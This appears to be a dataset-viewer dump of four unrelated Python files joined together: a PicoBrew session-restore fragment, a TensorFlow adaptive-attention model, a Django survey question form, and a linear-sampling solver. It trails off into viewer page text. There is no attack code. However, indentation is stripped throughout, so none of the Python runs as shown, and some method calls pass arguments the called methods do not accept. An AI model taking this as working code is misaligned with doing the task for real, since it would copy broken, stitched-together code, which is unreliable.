graph_data.update({'subtitle': {'text': 'Voltage: ' + voltage}})
return graph_data
def restore_active_sessions():
# initialize active sessions during start up
if active_brew_sessions == {}:
# print('DEBUG: restore_active_sessions() fetching abandoned server active sessions')
active_brew_session_files = list(brew_active_sessions_path().glob(file_glob_pattern))
for file in active_brew_session_files:
# print('DEBUG: restore_active_sessions() found {} as an active session'.format(file))
brew_session = load_brew_session(file)
# print('DEBUG: restore_active_sessions() {}'.format(brew_session))
if brew_session['uid'] not in active_brew_sessions:
active_brew_sessions[brew_session['uid']] = []
session = PicoBrewSession()
session.file = open(file, 'a')
session.file.flush()
session.filepath = file
session.alias = brew_session['alias']
session.created_at = brew_session['date']
session.name = brew_session['name']
session.type = brew_session['type']
session.session = brew_session['session'] # session guid
session.id = -1 # session id (integer)
if 'recovery' in brew_session:
session.recovery = brew_session['recovery'] # find last step name
# session.remaining_time = None
session.is_pico = brew_session['is_pico']
session.data = brew_session['data']
active_brew_sessions[brew_session['uid']] = session
|
<filename>adaptive_attention.py<gh_stars>1-10
import tensorflow as tf
from tensorflow.python.ops import rnn, rnn_cell, seq2seq
from utils import get_seq_length, _add_gradient_noise, _position_encoding, _xavier_weight_init, _last_relevant, batch_norm
#from https://github.com/DeNeutoy/act-rte-inference/blob/master/AdaptiveIAAModel.py
class Adaptive_Episodes_Config(object):
init_scale = 0.05
learning_rate = 0.001
max_grad_norm = 5
num_layers = 2
num_steps = 20
encoder_size = 128
inference_size = 256
max_epoch = 4
max_max_epoch = 3
keep_prob = 0.8
lr_decay = 0.8
batch_size = 32
vocab_size = 10000
bidirectional = False
embedding_size = 300
embedding_reg = 0.0001
train_embeddings = True
use_embeddings = False
eps = 0.1
max_computation = 20
step_penalty = 0.00001
#class AdaptiveIAAModel(object):
class Adaptive_Episodes(object):
""" Implements Iterative Alternating Attention for Machine Reading
http://arxiv.org/pdf/1606.02245v3.pdf """
def __init__(self, config, pretrained_embeddings=None,
update_embeddings=True, is_training=False):
self.config = config
def gate_mechanism(self, gate_input, scope):
with tf.variable_scope(scope):
if self.bidirectional:
size = 3*2*self.config.encoder_size + self.hidden_size
out_size = 2*self.config.encoder_size
else:
size = 3*self.config.encoder_size + self.hidden_size
out_size = self.config.encoder_size
hidden1_w = tf.get_variable("hidden1_w", [size, size])
hidden1_b = tf.get_variable("hidden1_b", [size])
hidden2_w = tf.get_variable("hidden2_w", [size, size])
hidden2_b = tf.get_variable("hidden2_b", [size])
sigmoid_w = tf.get_variable("sigmoid_w", [size, out_size])
sigmoid_b = tf.get_variable("sigmoid_b", [out_size])
if self.config.keep_prob < 1.0 and self.is_training:
gate_input = tf.nn.dropout(gate_input, self.config.keep_prob)
hidden1 = tf.nn.relu(tf.matmul(gate_input, hidden1_w) + hidden1_b)
if self.config.keep_prob < 1.0 and self.is_training:
hidden1 = tf.nn.dropout(hidden1, self.config.keep_prob)
hidden2 = tf.nn.relu(tf.matmul(hidden1, hidden2_w) + hidden2_b)
gate_output = tf.nn.sigmoid(tf.matmul(hidden2, sigmoid_w) + sigmoid_b)
return gate_output
def get_attention(self, prev_memory, fact_vec):
"""Use question vector and previous memory to create scalar attention for current fact"""
with tf.variable_scope("attention", reuse=True, initializer=_xavier_weight_init()):
W_1 = tf.get_variable("W_1")
b_1 = tf.get_variable("bias_1")
W_2 = tf.get_variable("W_2")
b_2 = tf.get_variable("bias_2")
features = [fact_vec*prev_memory, tf.abs(fact_vec - prev_memory)]
feature_vec = tf.concat(1, features)
attention = tf.matmul(tf.tanh(tf.matmul(feature_vec, W_1) + b_1), W_2) + b_2
return attention
def _attention_GRU_step(self, rnn_input, h, g):
"""Implement attention GRU as described by https://arxiv.org/abs/1603.01417"""
with tf.variable_scope("attention_gru", reuse=True, initializer=_xavier_weight_init()):
Wr = tf.get_variable("Wr")
Ur = tf.get_variable("Ur")
br = tf.get_variable("bias_r")
W = tf.get_variable("W")
U = tf.get_variable("U")
bh = tf.get_variable("bias_h")
r = tf.sigmoid(tf.matmul(rnn_input, Wr) + tf.matmul(h, Ur) + br)
h_hat = tf.tanh(tf.matmul(rnn_input, W) + r*tf.matmul(h, U) + bh)
rnn_output = g*h_hat + (1-g)*h
return rnn_output
#analogous to inference_step
def generate_episode(self, batch_mask, prob_compare, prob, counter, episode, fact_vecs, acc_states, counter_int, weight_container, bias_container):
"""Generate episode by applying attention to current fact vectors through a modified GRU"""
fact_vecs_t = tf.unpack(tf.transpose(fact_vecs, perm=[1,0,2]))
'''TRY REPLACING acc_states WITH episode AND SEE WHICH WORKS BETTER'''
attentions = [tf.squeeze(self.get_attention(acc_states, fv), squeeze_dims=[1]) for fv in fact_vecs_t]
attentions = tf.transpose(tf.pack(attentions))
softs = tf.nn.softmax(attentions)
softs = tf.split(1, self.max_input_len, softs)
gru_outputs = []
# set initial state to zero
h = tf.zeros((self.batch_size, self.hidden_size))
# use attention gru
for i, fv in enumerate(fact_vecs_t):
h = self._attention_GRU_step(fv, h, softs[i])
gru_outputs.append(h)
# extract gru outputs at proper index according to input_lens
gru_outputs = tf.pack(gru_outputs)
gru_outputs = tf.transpose(gru_outputs, perm=[1,0,2])
#analogous to output, new_state = self.inference_cell(input,state)
episode = _last_relevant(gru_outputs, self.input_len_placeholder)
''' # TARGET_SIDE ATTENTION
episode = self.generate_episode(prev_memory, fact_vecs, concat_all)
'''
p = tf.squeeze(tf.sigmoid(self.shared_linear_layer(episode, 1, True)))
new_batch_mask = tf.logical_and(tf.less(prob + p,self.one_minus_eps),batch_mask)
new_float_mask = tf.cast(new_batch_mask, tf.float32)
prob += p * new_float_mask
prob_compare += p * tf.cast(batch_mask, tf.float32)
'''based on github.com/tensorflow/tensorflow/issues/5608#issuecomment-260549420'''
#untied
Wt = weight_container.read(counter_int)
bt = bias_container.read(counter_int)
#tied
#Wt = weight_container.read(0)
#bt = bias_container.read(0)
counter_int+=1
def use_remainder():
remainder = tf.constant(1.0, tf.float32,[self.batch_size]) - prob
remainder_expanded = tf.expand_dims(remainder,1)
tiled_remainder = tf.tile(remainder_expanded,[1,self.hidden_size])
acc_state = tf.nn.relu(tf.matmul(tf.concat(1, [acc_states, episode * tiled_remainder]), Wt) + bt)
return acc_state
def normal():
p_expanded = tf.expand_dims(p * new_float_mask,1)
tiled_p = tf.tile(p_expanded,[1,self.hidden_size])
acc_state = tf.nn.relu(tf.matmul(tf.concat(1, [acc_states, episode * tiled_p]), Wt) + bt)
return acc_state
counter += tf.constant(1.0,tf.float32,[self.batch_size]) * new_float_mask
counter_condition = tf.less(counter,self.N)
condition = tf.reduce_any(tf.logical_and(new_batch_mask,counter_condition))
acc_state = tf.cond(condition, normal, use_remainder)
'''ADD MECHANISM TO INCREASE HALT PROB IF MULTIPLE SIMILAR ATTENTION MASKS IN A ROW;
would be the difference between consecutive attention masks
based on this cooment: reddit.com/r/MachineLearning/comments/59sfz8/research_learning_to_reason_with_adaptive/d9bgqxw/'''
return (new_batch_mask, prob_compare, prob, counter, episode, fact_vecs, acc_state, counter_int, weight_container, bias_container)
#analogous to do_inference_steps
def do_generate_episodes(self, prev_memory, fact_vecs, batch_size, hidden_size, max_input_len, input_len_placeholder, max_num_hops, epsilon, weight_container, bias_container):
self.batch_size = batch_size
self.hidden_size = hidden_size
self.max_input_len = max_input_len
self.input_len_placeholder = input_len_placeholder
counter_int=tf.constant(0)
self.shared_linear_layer = tf.make_template('shared_linear_layer', tf.nn.rnn_cell._linear)
self.one_minus_eps = tf.constant(1.0 - epsilon, tf.float32,[self.batch_size])
self.N = tf.constant(max_num_hops, tf.float32,[self.batch_size])
prob = tf.constant(0.0,tf.float32,[self.batch_size], name="prob")
prob_compare = tf.constant(0.0,tf.float32,[self.batch_size], name="prob_compare")
counter = tf.constant(0.0, tf.float32,[self.batch_size], name="counter")
self.counter = tf.constant(0.0, tf.float32,[self.batch_size], name="counter")
acc_states = tf.zeros_like(prev_memory, tf.float32, name="state_accumulator")
batch_mask = tf.constant(True, tf.bool,[self.batch_size])
# While loop stops when this predicate is FALSE.
# Ie all (probability < 1-eps AND counter < N) are false.
pred = lambda batch_mask, prob_compare, prob,\
counter, prev_memory, fact_vecs, acc_state, counter_int, weight_container, bias_container:\
tf.reduce_any(
tf.logical_and(
tf.less(prob_compare,self.one_minus_eps),
tf.less(counter,self.N)))
# only stop if all of the batch have passed either threshold
# Do while loop iterations until predicate above is false.
_,_,remainders,iterations,_,_,state,_,_,_ = \
tf.while_loop(pred, self.generate_episode,
[batch_mask, prob_compare, prob,
counter, prev_memory, fact_vecs, acc_states, counter_int, weight_container, bias_container])
return state, remainders, iterations |
<reponame>ericazhou7/uSurvey<filename>survey/forms/question.py
from django import forms
from django.forms import ModelForm
import re
from django.core.exceptions import ValidationError
from django.conf import settings
from survey.models import Question, BatchQuestion, QuestionSet
from survey.models import (QuestionOption, Batch, Answer, QuestionModule, MultiChoiceAnswer, MultiSelectAnswer,
QuestionFlow, AnswerAccessDefinition, ResponseValidation, DateAnswer, TextAnswer,
NumericalAnswer, AutoResponse, SurveyParameterList)
from survey.forms.form_helper import FormOrderMixin, Icons
class ValidationField(forms.ModelChoiceField, Icons):
pass
def get_question_form(model_class):
class QuestionForm(ModelForm, FormOrderMixin):
VALIDATION_ANSWER_TYPES = [DateAnswer.choice_name(), TextAnswer.choice_name(),
NumericalAnswer.choice_name(), AutoResponse.choice_name()]
options = forms.CharField(max_length=50, widget=forms.HiddenInput(), required=False)
response_validation = ValidationField(queryset=ResponseValidation.objects.all(), required=False)
def __init__(
self,
qset,
data=None,
initial=None,
parent_question=None,
instance=None,
prev_question=None):
super(QuestionForm, self).__init__(
data=data, initial=initial, instance=instance)
self.fields['identifier'].label = "Variable name"
self.fields['qset'].widget = forms.HiddenInput()
self.fields['qset'].initial = qset.pk
self.qset = qset
self.prev_question = prev_question
# depending on type of ussd/odk access of qset restrict the answer
# type
self.fields['answer_type'].choices = [
choice for choice in self.fields['answer_type'].choices if choice[0] in qset.answer_types]
self.fields['answer_type'].choices.insert(
0, ('', '----Select Answer Type----'))
if instance:
self.help_text = ' and '.join(AnswerAccessDefinition.access_channels(instance.answer_type))
self.fields['answer_type'].help_text = self.help_text
self.answer_map = {}
definitions = AnswerAccessDefinition.objects.all()
for defi in definitions:
self.answer_map[defi.answer_type] = self.answer_map.get(defi.answer_type, [])
self.answer_map[defi.answer_type].append(defi.channel)
self.fields['response_validation'].icons = {'add': {'data-toggle': "modal",
'data-target': "#add_validation",
'id': 'add_validation_button',
'title': 'Add Validation'},
}
self.parent_question = parent_question
self.order_fields(['module', 'group', 'identifier',
'text', 'answer_type', 'mandatory'])
class Meta:
model = model_class
exclude = []
widgets = {
'text': forms.Textarea(
attrs={
"rows": 5,
"cols": 30,
"maxlength": "150",
}),
}
def clean_group(self):
group = self.cleaned_data['group']
if group:
qset = QuestionSet.get(id=self.qset.pk)
identifiers = group.parameter_questions().values_list('identifier', flat=True)
existing_identifiers = Question.objects.filter(identifier__in=identifiers,
qset__pk=self.qset.pk).values_list('identifier',
flat=True)
if existing_identifiers.exists():
raise ValidationError(
'%s already exist in this %s. '
'Consider creating a question with modified identifier name and using skip logic in your %s' %
(','.join(existing_identifiers), qset.verbose_name(), qset.verbose_name()))
if hasattr(qset, 'survey') and qset.survey.listing_form:
existing_identifiers = qset.survey.listing_form.questions.filter(identifier__in=identifiers
).values_list('identifier',
flat=True)
if existing_identifiers.exists():
raise ValidationError(
'%s already exist as a listing question for this %s. '
'Consider creating a question with modified identifier name '
'and using skip logic in your %s' %
(','.join(existing_identifiers), qset.verbose_name(), qset.verbose_name()))
return group
def clean_options(self):
options = dict(self.data).get('options')
if options:
options = filter(lambda text: text.strip(), options)
# options = map(lambda option: re.sub("[%s]" % settings.USSD_IGNORED_CHARACTERS, '', option), options)
options = map(
lambda option: re.sub(
" ", ' ', option), options)
options = map(lambda option: option.strip(), options)
self.cleaned_data['options'] = options
return options
def clean_identifier(self):
identifier = self.cleaned_data['identifier']
pattern = '^[a-zA-Z][0-9a-zA-Z_]+$'
if re.match(pattern, identifier) is None:
raise ValidationError(
'Identifier must start with a letter, and must contain alphanumeric values or _')
if Question.objects.filter(
identifier__iexact=identifier,
qset__pk=self.qset.pk).exists():
if self.instance and self.instance.identifier == identifier:
pass
else:
raise ValidationError(
'%s already in use for this %s' %
(identifier, model_class.type_name()))
# if this is a batch question also check if there are parameter
# questions with this name
qset = QuestionSet.get(id=self.qset.pk)
if hasattr(
qset,
'parameter_list') and qset.parameter_list and qset.parameter_list.parameters.filter(
identifier__iexact=identifier).exists():
raise ValidationError(
'%s is already in captured as a group parameter for this %s' %
(identifier, qset.verbose_name()))
# for sampled surveys, check if this is already implemented in listing
if hasattr(qset, 'survey') and qset.survey.listing_form and qset.survey.listing_form.questions.filter(
identifier__iexact=identifier).exists():
raise ValidationError(
'%s is already in captured as a listing question for this %s' %
(identifier, qset.verbose_name()))
return self.cleaned_data['identifier']
def clean_text(self):
"""Make sure any field referenced here belongs to same batch. Field refs are denoted by {{.+}} brackets
:return:
"""
pattern = '{{ *([0-9a-zA-Z_]+) *}}'
label = self.data.get('text', '')
requested_identifiers = re.findall(pattern, label)
if requested_identifiers:
ids = self.qset.questions.filter(
identifier__in=requested_identifiers).values_list(
'identifier', flat=True)
ids = list(ids)
if len(set(ids)) != len(set(requested_identifiers)):
raise ValidationError(
'%s is not in %s' %
(', '.join(
set(requested_identifiers).difference(ids)),
self.qset.name))
return self.cleaned_data['text']
def clean(self):
answer_type = self.cleaned_data.get('answer_type', None)
options = self.cleaned_data.get('options', None)
response_validation = self.cleaned_data.get('response_validation', None)
text = self.cleaned_data.get('text', None)
self._check__multichoice_and_options_compatibility(
answer_type, options)
self._strip_special_characters_for_ussd(text)
if answer_type:
answer_class = Answer.get_class(answer_type)
validator_names = [validator.__name__ for validator in answer_class.validators()]
if response_validation and response_validation.validation_test not in validator_names:
raise ValidationError('Selected Validation is not compatible with chosen answer type')
return self.cleaned_data
def _check__multichoice_and_options_compatibility(
self, answer_type, options):
if answer_type in [
MultiChoiceAnswer.choice_name(),
MultiSelectAnswer.choice_name()] and not options:
message = 'Question Options missing.'
self._errors['answer_type'] = self.error_class([message])
del self.cleaned_data['answer_type']
if answer_type not in [
MultiChoiceAnswer.choice_name(),
MultiSelectAnswer.choice_name()] and options:
del self.cleaned_data['options']
def _strip_special_characters_for_ussd(self, text):
if text:
text = re.sub(
"[%s]" %
settings.USSD_IGNORED_CHARACTERS,
'',
text)
self.cleaned_data['text'] = re.sub(" ", ' ', text)
def kwargs_has_batch(self, **kwargs):
return 'qset' in kwargs and isinstance(kwargs['qset'], Batch)
def options_supplied(self, commit):
return commit and self.cleaned_data.get('options', None)
def save_question_options(self, question):
order = 0
options = self.cleaned_data['options']
question.options.all().delete()
# options.sort()
for text in options:
order += 1
QuestionOption.objects.create(
question=question, text=text, order=order)
def save(self, commit=True, zombie=False, **kwargs):
question = super(QuestionForm, self).save(commit=False)
qset = question.qset
if commit:
if question.pk is None:
question.save()
# get the last question inline
# create a inline flow with current qset
qset = question.qset
# qset = QuestionSet.get(id=qset.id)
if self.prev_question:
last_question = self.prev_question
else:
last_question = qset.last_question_inline()
if last_question:
if zombie is False:
# incase, inline flow with no next quest already
# exists
flow, _ = QuestionFlow.objects.get_or_create(
question=last_question, validation__isnull=True)
prev_next_question = flow.next_question
flow.next_question = question
flow.save()
# now connect present question back to the flow
QuestionFlow.objects.create(
question=question, next_question=prev_next_question)
elif qset.start_question is None:
qset.start_question = question
qset.save()
else:
question.save()
if hasattr(qset, 'survey'): # basicallyy check for Batch scenario
SurveyParameterList.update_parameter_list(qset)
# self.qset.questions_inline.invalidate()
if self.options_supplied(commit):
self.save_question_options(question)
return question
return QuestionForm
QuestionForm = get_question_form(Question)
BatchQuestionForm = get_question_form(BatchQuestion)
|
import time
import numpy as np
from tqdm import trange
import scipy.sparse as sp
from scipy.linalg import norm
from joblib import Parallel, delayed
from vezda.math_utils import humanReadable
from vezda.svd_utils import load_svd, svd_needs_recomputing, compute_svd
from vezda.LinearOperators import asConvolutionalOperator
def scipy_lsmr(A, b, damp, atol, btol):
return sp.linalg.lsmr(A, b, damp, atol, btol)[0]
def scipy_lsqr(A, b, damp, atol, btol):
return sp.linalg.lsqr(A, b, damp, atol, btol)[0]
def inverse_svd(V, Sp, Uh, b):
return V.dot(Sp.dot(Uh.dot(b)))
#==============================================================================
# Super class (Parent class)
# A class for solving linear systems Ax = b
#
# Class data objects:
# linear operator: A
# right-hand side vectors: B = [b1 b2 ... bn]
#
# Class methods:
# solve by iterative least-squares: solve_lsmr
# solve by iterative least-squares: solve_lsqr
# solve by singular-value decomposition: solve_svd
#==============================================================================
class LinearSystem(object):
def __init__(self, LinearOperator, rhs_vectors):
self.A = LinearOperator
self.B = rhs_vectors
def solve_lsmr(self, damp=0.0, atol=1.0e-8, btol=1.0e-8, nproc=1, fft=False):
M, N = self.A.shape
K = self.B.shape[2]
if nproc != 1:
startTime = time.time()
X = Parallel(n_jobs=nproc, verbose=11)(
delayed(scipy_lsmr)(self.A, self.B[:, :, i].reshape(M),
damp=damp, atol=atol, btol=btol)
for i in range(K))
endTime = time.time()
X = np.asarray(X, dtype=self.A.dtype).T
else:
# initialize solution matrix X
X = np.zeros((N, K), dtype=self.A.dtype)
startTime = time.time()
for i in trange(K):
X[:, i] = scipy_lsmr(self.A, self.B[:, :, i].reshape(M),
damp=damp, atol=atol, btol=btol)
endTime = time.time()
print('Elapsed time:', humanReadable(endTime - startTime))
return X
def solve_lsqr(self, damp=0.0, atol=1.0e-8, btol=1.0e-8, nproc=1):
M, N = self.A.shape
K = self.B.shape[2]
if nproc != 1:
startTime = time.time()
X = Parallel(n_jobs=nproc, verbose=11)(
delayed(scipy_lsqr)(self.A, self.B[:, :, i].reshape(M),
damp=damp, atol=atol, btol=btol)
for i in range(K))
endTime = time.time()
X = np.asarray(X, dtype=self.A.dtype).T
else:
# initialize solution matrix X
X = np.zeros((N, K), dtype=self.A.dtype)
startTime = time.time()
for i in trange(K):
X[:, i] = scipy_lsqr(self.A, self.B[:, :, i].reshape(M),
damp=damp, atol=atol, btol=btol)
endTime = time.time()
print('Elapsed time:', humanReadable(endTime - startTime))
return X
def solve_svd(self, U, s, Vh, alpha=0.0, nproc=1):
#======================================================================
# Construct the pseudoinverse of A : A+ = V Sp Uh
if np.issubdtype(U.dtype, np.complexfloating):
# singular vectors are complex
Uh = U.getH()
V = Vh.getH()
else:
# singular vectors are real
Uh = U.T
V = Vh.T
# Construct the diagonal matrix 'Sp' from 's'
s = np.divide(s, alpha + s**2)
Sp = sp.diags(s)
#======================================================================
# Apply SVD to obtain solution matrix X
M, N = self.A.shape
K = self.B.shape[2]
if nproc != 1:
startTime = time.time()
X = Parallel(n_jobs=nproc, verbose=11)(
delayed(inverse_svd)(V, Sp, Uh, self.B[:, :, i].reshape(M))
for i in range(K))
endTime = time.time()
X = np.asarray(X, dtype=self.A.dtype).T
else:
# initialize solution matrix X
X = np.zeros((N, K), dtype=self.A.dtype)
startTime = time.time()
for i in trange(K):
X[:, i] = inverse_svd(V, Sp, Uh, self.B[:, :, i].reshape(M))
endTime = time.time()
print('Elapsed time:', humanReadable(endTime - startTime))
return X
#==============================================================================
# Subclass (Derived class)
# A class for solving linear sampling problems of the form Ax = b
#
# Class data objects:
# kernel: data or test functions
# right-hand side vectors: B = [b1 b2 ... bn]
#
# Class methods:
# solve system of equations using specified method: solve(method)
# construst image from solutions: construct_image()
#==============================================================================
class LinearSamplingProblem(LinearSystem):
def __init__(self, operatorName, kernel, rhs_vectors):
super().__init__(asConvolutionalOperator(kernel), rhs_vectors)
self.operatorName = operatorName
self.kernel = kernel
def solve(self, method, fly=True, nproc=1, alpha=0.0, atol=1.0e-8, btol=1.0e-8, k=None):
'''
method : specified direct or iterative method for solving Ax = b
alpha : regularization parameter
atol : error tolerance for the linear operator
btol : error tolerance for the right-hand side vectors
k : number of singular values/vectors
'''
#======================================================================
if method == 'lsmr':
print('Localizing targets...')
return super().solve_lsmr(alpha, atol, btol, nproc, fly)
elif method == 'lsqr':
print('Localizing targets...')
return super().solve_lsqr(alpha, atol, btol, nproc, fly)
elif method == 'svd':
# Load or recompute the SVD of A as needed
if self.operatorName == 'nfo':
filename = 'NFO_SVD.npz'
elif self.operatorName == 'lso':
filename = 'LSO_SVD.npz'
try:
U, s, Vh = load_svd(filename)
if svd_needs_recomputing(self.kernel, k, U, s, Vh):
U, s, Vh = compute_svd(self.kernel, k, self.operatorName)
except IOError as err:
print(err.strerror)
if k is None:
k = input('Specify the number of singular values and vectors to compute: ')
U, s, Vh = compute_svd(self.kernel, k, self.operatorName)
print('Localizing targets...')
return super().solve_svd(U, s, Vh, alpha, nproc, fly)
def construct_image(self, solutions):
print('Constructing the image...')
# Get machine precision
eps = np.finfo(float).eps # about 2e-16 (used in division
# so we never divide by zero)
if self.operatorName == 'nfo':
Image = 1.0 / (norm(solutions, axis=0) + eps)
# Normalize Image to take on values between 0 and 1
Imin = np.min(Image)
Imax = np.max(Image)
Image = (Image - Imin) / (Imax - Imin + eps)
elif self.operatorName == 'lso':
Nm, Nsp = self.kernel.shape[1], self.kernel.shape[2]
K = solutions.shape[1]
solutions = solutions.reshape((Nsp, Nm, K))
# Initialize the Image
Image = np.zeros(Nsp)
for i in range(K):
indicator = norm(solutions[:, :, i], axis=1)
Imin = np.min(indicator)
Imax = np.max(indicator)
indicator = (indicator - Imin) / (Imax - Imin + eps)
Image += indicator**2
# Image is defined as the root-mean-square indicator
Image = np.sqrt(Image / K)
return Image |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.